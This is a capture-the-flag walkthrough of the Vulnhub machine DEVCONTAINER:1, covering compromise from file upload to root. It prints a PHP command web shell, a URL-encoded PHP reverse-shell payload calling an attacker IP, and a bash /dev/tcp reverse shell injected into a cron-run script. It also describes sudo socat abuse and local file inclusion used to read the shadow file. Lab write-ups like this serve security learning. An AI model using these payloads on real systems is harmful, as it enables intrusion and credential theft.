Goal: 2 flagas
Difficulty: Easy-intermediate

Well, not much to go on here. The box is DEVCONTAINER: 1 from vulnhub.


We’ve got one port only; HTTP on 80.


So with a quick gobuster fishing expedition we find an upload directory:

And it contains the text: Allowed file types: jpg,gif,png,zip,txt,xls,doc
However, in the page source there is a comment saying I need to validate file extensions - so maybe the whitelisting hasn’t been implemented yet? Let’s see.

I create a file test.php with the content:

<?php system($_GET['cmd']);?>

And try to upload it - it is accepted. So that’s great. Now we go fire off a reverse shell:$sock%3dfsockopen(%22192.168.1.77%22,1234)%3bexec(%22/bin/sh+-i+%3C%263+%3E%263+2%3E%263%22)%3b%27

And we’re on the box as www-data.

In a container

We’re in a Docker container and there is no python or python3, which I would normally use to upgrade my shell. Instead I do:

/usr/bin/script -qc /bin/bash /dev/null
stty raw -echo; fg; reset

And that does the job. The suggestion came from here.

In the web directory, there are a couple of interesting things, including this script:

www-data@1a135ef22c7a:/var/www/html/Maintenance-Web-Docker$ cat
#Version 1.0
#This script monitors the uploaded files. It is a reverse shell monitoring measure.
#path= /home/richard/web/webapp/upload/files/

So this executes the script. What’s in that?

www-data@1a135ef22c7a:/var/www/html/Maintenance-Web-Docker$ cat
date >> /home/richard/web/Maintenance-Web-Docker/out.txt
ls /home/richard/web/upload/files/ | wc -l >> /home/richard/web/Maintenance-Web-Docker/out.txt

We have write access to, so what if we add a line to it?

www-data@1a135ef22c7a:/var/www/html/Maintenance-Web-Docker$ echo "bash -i >& /dev/tcp/ 0>&1" >>

With a new listener, we get a new shell as Richard.


From Richard we can get our first flag, user.txt: 3a6b99f59ea363803bcafc7f5dd9b1e8

Richard appears to have an interesting capability:

richard@EC2:~$ sudo -l
sudo -l
Matching Defaults entries for richard on EC2:
    env_reset, mail_badpass,

User richard may run the following commands on EC2:
    (ALL) NOPASSWD: /home/richard/HackTools/socat TCP-LISTEN\:8080\,fork

We can run the command; nothing very interesting seems to happen. I’m not familiar with socat, but doing some research shows this is a port forwarding command. We can visit in Firefox - and there is a webpage. This port wasn’t open previously.


The webpage has two links:

Interestingly, these aren’t separate pages, but view parameters in index.php (and they don’t work). Does anything else work? Yes:

So we’ve got Local File Inclusion and can read both the shadow file and the last flag. I copied the root hash and threw John at it but it didn’t seem keen to break.

So we’ve gotten the flag - but can we also get a shell? Sure, why not.

Since I didn’t previously upload a shell (just a command grabber), I need to upload one now - I used the usual pentestmonkey shell. Then I can go to:

And catch a reverse shell as root. Now we really are done.